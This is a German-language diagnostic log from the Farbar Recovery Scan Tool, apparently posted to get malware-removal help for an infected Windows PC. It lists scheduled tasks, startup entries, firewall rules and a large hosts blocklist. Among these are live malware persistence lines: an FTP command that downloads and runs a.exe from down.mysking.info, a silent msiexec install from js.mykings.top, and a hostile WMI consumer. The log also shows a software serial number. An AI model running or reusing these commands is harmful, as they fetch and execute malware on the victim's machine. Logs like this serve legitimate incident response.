CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{67F2A879-82D5-4A6D-8CC5-FFB3C114B69D}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\so_activex_x64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {24C812DF-71F3-4D63-8AD1-03A9C21B61AA} - System32\Tasks\Opera scheduled Autoupdate 1374235318 => C:\Program Files (x86)\Opera\launcher.exe [2017-04-25] (Opera Software)
Task: {313BCD1C-4B57-44E1-B48A-D50AF01438EE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {34A9F733-C8B1-4D67-B2F6-6EAD78726B9E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core1d2bfa05e8820a2 => C:\Users\Hamlet\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)
Task: {8008BE50-D664-4FA1-A1CB-F16026BB990C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001UA => C:\Users\Hamlet\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)
Task: {93996587-9BAA-4382-BB39-57252E297464} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.11.42\SymErr.exe
Task: {9BF6475D-B9D7-4960-AD5A-D40AE0A9DCE6} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.11.42\SymErr.exe
Task: {A419B2E8-1722-46E3-B623-D4F33B37B12D} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_127_pepper.exe [2017-03-25] (Adobe Systems Incorporated)
Task: {ADBCFE3E-F0C5-420E-BB5A-637E2CD115FD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core => C:\Users\Hamlet\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)
Task: {C92686B0-5204-455A-B340-9F98FD8D619A} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
Task: {F53029DC-F860-49D1-A903-3FD23CDED4BF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {F539D280-BB89-40F5-A7C6-DFD297E0E999} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer:
Shortcut: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Media\Audiograbber\Support-Forum.lnk -> hxxp:
Shortcut: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Coding\Datenbanken\PostgreSQL 9.3\SQL Shell (psql).lnk -> C:\Program Files\DataBases\PostgreSQL\scripts\runpsql.bat (Keine Datei)
Shortcut: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Meine Websites auf MSN\target.lnk -> hxxp://www.msnusers.co
ShortcutWithArgument: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Coding\RAD Studio XE2\RAD Studio Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /K "C:\Program Files (x86)\Embarcadero\RAD Studio\9.0\bin\rsvars.bat"
ShortcutWithArgument: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Coding\RAD Studio 2009\RAD Studio-Befehlszeile.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /K "C:\Program Files (x86)\CodeGear\RAD Studio\6.0\bin\rsvars.bat"
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2016-04-08 11:57 - 2007-08-14 03:41 - 00022016 _____ () C:\Windows\System32\cl31cl6.dll
2016-04-05 13:25 - 2016-04-05 13:25 - 00216576 _____ () C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe
2013-11-24 14:37 - 2013-11-24 14:37 - 00075504 _____ () C:\Program Files\Internet\TortoiseSVN\bin\TortoiseStub.dll
2013-11-24 14:36 - 2013-11-24 14:36 - 00088304 _____ () C:\Program Files\Internet\TortoiseSVN\bin\libsasl.dll
2017-04-30 13:19 - 2017-04-30 13:19 - 00052392 _____ () C:\Program Files (x86)\Internet\FileZilla\fzshellext_64.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Utils\Unlocker\UnlockerCOM.dll
2016-05-15 20:58 - 2009-05-07 17:51 - 00071680 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2016-05-15 20:58 - 2009-05-07 17:53 - 00379392 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2016-05-15 20:58 - 2008-01-18 15:50 - 00098816 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2016-05-15 20:58 - 2009-06-05 15:18 - 47581696 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2016-10-07 22:47 - 2016-10-07 22:47 - 00225696 _____ () C:\Program Files (x86)\VyprVPN\OpenVPN\bin\liblzo2-2.dll
2016-10-07 22:47 - 2016-10-07 22:47 - 00122264 _____ () C:\Program Files (x86)\VyprVPN\OpenVPN\bin\libpkcs11-helper-1.dll
2016-04-05 13:12 - 2016-04-05 13:12 - 00221696 _____ () C:\Program Files (x86)\GNU\GnuPG\libksba-8.dll
2016-04-05 13:06 - 2016-04-05 13:06 - 00087552 _____ () C:\Program Files (x86)\GNU\GnuPG\libgpg-error-0.dll
2016-04-05 13:01 - 2016-04-05 13:01 - 00050176 _____ () C:\Program Files (x86)\GNU\GnuPG\libw32pth-0.dll
2016-04-05 13:12 - 2016-04-05 13:12 - 00073728 _____ () C:\Program Files (x86)\GNU\GnuPG\libassuan-0.dll
2016-04-05 13:15 - 2016-04-05 13:15 - 00750592 _____ () C:\Program Files (x86)\GNU\GnuPG\libgcrypt-20.dll
2016-10-07 22:48 - 2016-10-07 22:48 - 00104960 _____ () C:\Program Files (x86)\VyprVPN\GoldenFrogWFP.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\Windows\system32\msln.exe:a6aba34c1f3935df3b96c0fd4e3ef58c [562]
AlternateDataStreams: C:\ProgramData\TEMP:0B174FAE [141]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com
Da befinden sich 7866 mehr Seiten.
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123simsen.com -> www.123simsen.com
Da befinden sich 7866 mehr Seiten.
==================== Hosts Inhalt: ==========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 04:34 - 2016-12-24 17:48 - 00450771 _____ C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com
127.0.0.1 www.123moviedownload.com
Da befinden sich 15463 zusätzliche Einträge.
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 10.3.29.1 - 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ImageFox.lnk => C:\Windows\pss\ImageFox.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Hamlet^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Telefon- und Branchenbuch + Rückwärtssuche Frühjahr 2015 - Schnellstarter.lnk => C:\Windows\pss\Telefon- und Branchenbuch + Rückwärtssuche Frühjahr 2015 - Schnellstarter.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeCS4ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Bonus.SSR.FR11 => "C:\Program Files (x86)\ABBYY\Bonus.ScreenshotReader.exe" /autorun
MSCONFIG\startupreg: CanonSolutionMenu => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe /logon
MSCONFIG\startupreg: CorelDRAW Graphics Suite 11b => C:\Program Files (x86)\Grafik\Corel\Register\registration.exe /title="CorelDRAW Graphics Suite 11" /date=110313 serial=DR11WBL-2155594-HXE
MSCONFIG\startupreg: Google Update => C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: Malwarebytes TrayApp => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe
MSCONFIG\startupreg: Nvtmru => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
MSCONFIG\startupreg: RAMDiskForWorkstations => "C:\Program Files\SoftPerfect RAM Disk\RAMDiskWS.exe" /hide
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Utils\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: start1 => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TuneClone => C:\Program Files\Media\TuneClone\TuneClone.exe /silence
MSCONFIG\startupreg: vmware-tray => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe
MSCONFIG\startupreg: WebResearchStartupInit => "D:\Programme\Tools\WebRech3\WRGet.exe" /StartupCheck
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [TCP Query User{68AFFA25-3296-4DA0-8B02-3D9FB80D850B}C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe] => (Block) C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe
FirewallRules: [UDP Query User{0706E191-3A22-478F-A52A-1B7AE968BDE7}C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe] => (Block) C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe
FirewallRules: [{FAD76AFA-DCA8-4476-9633-409C5BEA9789}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{349E0098-6B9E-4FEA-8B0C-149D50096675}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{FDB54937-582B-4982-8678-9DA3AB002F59}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\CorelDRW.exe
FirewallRules: [{23277EC4-4B02-4616-A941-39307182307F}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\CorelPP.exe
FirewallRules: [{CBB0D883-DC81-4291-821D-06D5613038BF}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\BarCode.exe
FirewallRules: [{78F2B95F-6411-4AA2-B683-586A334A1A12}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\Capture.exe
FirewallRules: [{0FFD897F-7644-4BA4-B98C-C23221387531}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\PrintWiz.exe
FirewallRules: [TCP Query User{483F6C72-9B04-40FA-8CBE-06D9FE446762}C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe] => (Allow) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [UDP Query User{363C0C19-78E1-484A-A977-6EE7BEF4F128}C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe] => (Allow) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [{3CBA25F2-04AA-49A5-8427-0A45A115D82F}] => (Block) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [{D2C2E1D9-96EF-46E6-B2FE-246B4BA799E3}] => (Block) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [TCP Query User{08876A54-2EAF-4252-B2B0-0462005E3B87}C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [UDP Query User{F00AE74F-1BC1-4309-9355-BF6C648DACBE}C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [{C657E7DA-1568-40FC-BA3D-66F72D3E9740}] => (Block) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [{6D4C1424-00BC-44B9-85F5-2FB63606F6C1}] => (Block) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [{19581BBE-EF6C-4443-AAAB-5379C89DCF81}] => (Allow) C:\Program Files (x86)\Utils\AVG\avgmfapx.exe
FirewallRules: [{90227C6B-E3EB-4DCE-97EB-090D3B81E671}] => (Allow) C:\Program Files (x86)\Utils\AVG\avgmfapx.exe
FirewallRules: [{1A477910-65C6-4715-B0E4-77C72C0E6053}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe
FirewallRules: [{FD954E80-8F27-4F66-AC73-B1BB87A63A4B}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe
FirewallRules: [{08DB855E-09A8-4875-BD7E-1B6AC90EAF17}] => (Block) LPort=5353
FirewallRules: [{FF3EDF2E-4953-4CE4-98D5-EA367626CD86}] => (Block) C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe
FirewallRules: [{3A61D0B1-77B9-4171-894A-579D088F2BA3}] => (Block) C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe
FirewallRules: [{47149BBC-1EAD-4B4F-8CE5-70E51AA51B35}] => (Allow) C:\Program Files (x86)\Grafik\CorelX5\Connect\Connect.exe
FirewallRules: [{2A3226C6-1C2C-4A82-A79F-89B6A547E762}] => (Allow) C:\Program Files (x86)\Grafik\CorelX5\Connect\Connect.exe
FirewallRules: [{01AD1DC4-26B1-4452-BA22-7945E0BED4B1}] => (Block) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{3765A543-CC1F-49F5-B229-0781D050E86A}] => (Block) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{5F827850-606C-44E2-8111-8634E5F2EDE2}] => (Allow) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{15A06583-EED4-488F-A985-6EECD0A635D2}] => (Allow) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{CCAC3702-8C37-482C-BB46-47FFBFC4B7D9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{84C06AE4-8AC3-4EE2-9F4F-063D4A3D8C9D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{E3BB1D5B-42FB-47E0-A2FB-8FA667DDE0FC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{A07DB0EC-DA9D-4E34-A2CB-796AC10C9FA1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{4C0FF042-60FE-42E8-AFF1-7AF239F4B7D4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{A46C77D0-2D55-49FA-B87E-F326175E38F5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{66BB3B7C-A49D-44D3-92A7-B2EE903E8E0E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{CD81164C-C0F4-460D-9EE9-D81BC2985F64}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{13A4F32E-7D87-4E5A-B1A0-603FC14813A9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{E6FE2263-15CF-45C3-9199-59E37137BDFA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{A23074D6-73A3-4A46-9D61-EB1569267873}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{B573953F-D3E0-49D9-83AD-36E9C67CEA35}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{7106D5F3-AA51-4778-875F-8AE876D25A95}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{449549A4-D449-491A-B867-0B95CD3DE433}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{3874EDA5-E8C8-4A46-9DEF-E33B72195F1D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{1268C691-A8AC-40ED-9952-23D9C4BB71F8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{8C243BF8-DB31-4DF7-940E-FA19302993E3}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{57C69D05-FBD6-4D9B-B451-EC9FE7A14258}] => (Block) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{CD23B2BB-D303-42A9-863C-B950A827912D}] => (Allow) C:\Users\Hamlet\AppData\Local\Temp\7zS3E3E\HPDiagnosticCoreUI.exe
FirewallRules: [{DAC8E436-A4CD-409F-97FD-EA1F98B923F0}] => (Allow) C:\Users\Hamlet\AppData\Local\Temp\7zS3E3E\HPDiagnosticCoreUI.exe
FirewallRules: [{75B5D5BE-C24E-4A83-8A5F-8E7DCE4F97B2}] => (Allow) Z:\fsetup.exe
FirewallRules: [{3BF98EC0-BFB2-4EE0-BB16-4CA84E371044}] => (Allow) Z:\fsetup.exe
FirewallRules: [TCP Query User{2CE196F2-4B52-4401-B08B-C708DBCC8D01}C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [UDP Query User{6095DA53-011E-4477-A6F6-963C13AA33DB}C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [{342AE7A5-5B4B-4E73-83D7-2799D06459B2}] => (Block) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [{11148652-24CA-499C-AE3B-1A16F68B4A46}] => (Block) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [{148FE666-819D-4FDE-89D7-9C2C214E9504}] => (Allow) C:\Users\Hamlet\AppData\Local\Google\Chrome SxS\Application\chrome.exe
FirewallRules: [{32BAF0C1-1CE8-4178-9E32-B035DE2A93A7}] => (Block) LPort=445
FirewallRules: [{8B465A3B-3789-4D9E-B4FC-32F801778C87}] => (Block) LPort=445
==================== Wiederherstellungspunkte =========================
06-05-2017 17:20:29 Revo Uninstaller's restore point - Avast Free Antivirus
06-05-2017 19:50:15 JRT Pre-Junkware Removal
==================== Fehlerhafte Geräte im Gerätemanager =============
Name: TAP-VyprVPN Adapter V9
Description: TAP-VyprVPN Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-VyprVPN Provider V9
Service: tapvyprvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/06/2017 10:17:18 PM) (Source: WinMgmt) (EventID: 10) (User: )
